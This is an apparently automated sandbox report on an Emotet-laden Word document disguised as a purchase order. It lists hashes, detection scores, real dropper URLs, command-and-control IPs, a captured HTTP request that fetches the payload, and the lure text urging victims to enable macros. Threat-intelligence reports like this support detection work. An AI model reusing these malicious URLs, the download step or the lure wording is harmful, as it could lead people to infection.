Analysis Report PO# 01222021.doc

Overview

General Information

Sample Name: PO# 01222021.doc
Analysis ID: 344615
MD5: 556b98b4cdae000de8f496d6d896743c
SHA1: b7ca4118eab252bc4758fa18265b04a2afbbf9c2
SHA256: dcfb145c4f46a072e988cdeafc065f8116dc3b27d6bed447024677f3ea2f252a

Most interesting Screenshot:

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Document contains an embedded VBA with many string operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://cab.mykfn.com/admin/X/ Avira URL Cloud: Label: malware
Source: http://gocphongthe.com/wp-content/lMMC/ Avira URL Cloud: Label: malware
Source: http://ie-best.net/online-timer-kvhxz/ilXL/ Avira URL Cloud: Label: malware
Source: http://www.letscompareonline.com/de.letscompareonline.com/wYd/ Avira URL Cloud: Label: malware
Source: http://bhaktivrind.com/cgi-bin/JBbb8/ Avira URL Cloud: Label: malware
Source: http://cab.mykfn.com Avira URL Cloud: Label: malware
Source: http://vanddnabhargave.com/asset/W9o/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://cab.mykfn.com/admin/X/ Virustotal: Detection: 15% Perma Link
Source: http://gocphongthe.com/wp-content/lMMC/ Virustotal: Detection: 10% Perma Link
Source: http://ie-best.net/online-timer-kvhxz/ilXL/ Virustotal: Detection: 10% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll Metadefender: Detection: 48% Perma Link
Source: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll ReversingLabs: Detection: 85%
Multi AV Scanner detection for submitted file
Source: PO# 01222021.doc Virustotal: Detection: 66% Perma Link
Source: PO# 01222021.doc Metadefender: Detection: 48% Perma Link
Source: PO# 01222021.doc ReversingLabs: Detection: 67%
Machine Learning detection for dropped file
Source: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll Joe Sandbox ML: detected

Compliance:

barindex
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Binary contains paths to debug symbols
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2097930376.000000001B390000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: cab.mykfn.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 103.143.46.51:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 103.143.46.51:80

Networking:

barindex
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmp String found in memory: http://cab.mykfn.com/admin/X/!http://bhaktivrind.com/cgi-bin/JBbb8/!http://vanddnabhargave.com/asset/W9o/!http://ie-best.net/online-timer-kvhxz/ilXL/!http://gocphongthe.com/wp-content/lMMC/!http://www.letscompareonline.com/de.letscompareonline.com/wYd/!http://cambiasuhistoria.growlab.es/wp-content/hGhY2/
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 195.159.28.230:8080
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /admin/X/ HTTP/1.1Host: cab.mykfn.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 195.159.28.230 195.159.28.230
Source: Joe Sandbox View IP Address: 69.38.130.14 69.38.130.14
Source: Joe Sandbox View IP Address: 103.143.46.51 103.143.46.51
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ASN-CATCHCOMNO ASN-CATCHCOMNO
Source: Joe Sandbox View ASN Name: TWRS-NYCUS TWRS-NYCUS
Source: Joe Sandbox View ASN Name: NETMAGIC-APNetmagicDatacenterMumbaiIN NETMAGIC-APNetmagicDatacenterMumbaiIN
Source: unknown TCP traffic detected without corresponding DNS query: 69.38.130.14
Source: unknown TCP traffic detected without corresponding DNS query: 69.38.130.14
Source: unknown TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B6B610EC-9B88-4A7A-BAAD-75353DCC52EC}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /admin/X/ HTTP/1.1Host: cab.mykfn.comConnection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2102951545.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102183359.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115579456.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125315211.0000000001E80000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: cab.mykfn.com
Source: powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmp String found in binary or memory: http://bhaktivrind.com/cgi-bin/JBbb8/
Source: powershell.exe, 00000005.00000002.2097308660.0000000003C08000.00000004.00000001.sdmp String found in binary or memory: http://cab.mykfn.com
Source: powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmp String found in binary or memory: http://cab.mykfn.com/admin/X/
Source: powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmp String found in binary or memory: http://cambiasuhistoria.growlab.es/wp-content/hGhY2/
Source: powershell.exe, 00000005.00000002.2097308660.0000000003C08000.00000004.00000001.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: powershell.exe, 00000005.00000002.2097308660.0000000003C08000.00000004.00000001.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmp String found in binary or memory: http://gocphongthe.com/wp-content/lMMC/
Source: powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmp String found in binary or memory: http://ie-best.net/online-timer-kvhxz/ilXL/
Source: rundll32.exe, 00000006.00000002.2102951545.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102183359.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115579456.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125315211.0000000001E80000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2102951545.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102183359.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115579456.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125315211.0000000001E80000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000006.00000002.2103112691.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102339016.0000000002067000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116873780.0000000002207000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2103112691.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102339016.0000000002067000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116873780.0000000002207000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2097308660.0000000003C08000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000005.00000002.2092035965.0000000002190000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117451818.00000000028F0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2103112691.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102339016.0000000002067000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116873780.0000000002207000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmp String found in binary or memory: http://vanddnabhargave.com/asset/W9o/
Source: rundll32.exe, 00000006.00000002.2103112691.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102339016.0000000002067000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116873780.0000000002207000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2092035965.0000000002190000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117451818.00000000028F0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2102951545.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102183359.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115579456.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125315211.0000000001E80000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2103112691.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102339016.0000000002067000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116873780.0000000002207000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000005.00000002.2097226139.0000000003B1E000.00000004.00000001.sdmp String found in binary or memory: http://www.letscompareonline.com/de.letscompareonline.com/wYd/
Source: rundll32.exe, 00000006.00000002.2102951545.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102183359.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115579456.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125315211.0000000001E80000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000009.00000002.2125315211.0000000001E80000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2097308660.0000000003C08000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0D

E-Banking Fraud:

barindex
Yara detected Emotet
Source: Yara match File source: 00000009.00000002.2125204739.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2340896532.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2169811211.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2182561871.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2135567121.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2339373586.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2192714957.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2149727008.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2192700429.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2182761575.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2165744116.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2128583729.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2125222649.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2151547723.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2102076691.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2135550534.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2114421803.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2160551478.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2102719700.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2117996445.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2114399878.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2149672448.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2169787783.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2137671003.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2193587143.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2170530219.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2184882219.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2102091974.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2339389951.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2160390338.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 12.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.250000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.190000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.230000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.190000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available fOr protected documents. You have to press "E
Source: Screenshot number: 4 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 6,262 N@m 13 ;a 1009
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available fOr protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll Jump to dropped file
Very long command line found
Source: unknown Process created: Commandline size = 5949
Source: unknown Process created: Commandline size = 5848
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5848 Jump to behavior
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Agilzgamuljjdwml\ Jump to behavior
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001B0D5 7_2_1001B0D5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000DBB2 7_2_1000DBB2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10014602 7_2_10014602
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002814 7_2_10002814
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001821E 7_2_1001821E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10018A24 7_2_10018A24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001DA27 7_2_1001DA27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000A82A 7_2_1000A82A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000B22A 7_2_1000B22A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000422B 7_2_1000422B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001A02C 7_2_1001A02C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001A82C 7_2_1001A82C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000E42E 7_2_1000E42E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000BA46 7_2_1000BA46
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000F249 7_2_1000F249
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10018C4D 7_2_10018C4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001505A 7_2_1001505A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001662 7_2_10001662
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001664 7_2_10001664
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001D87D 7_2_1001D87D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10010082 7_2_10010082
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001E689 7_2_1001E689
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10018489 7_2_10018489
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002C93 7_2_10002C93
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10011494 7_2_10011494
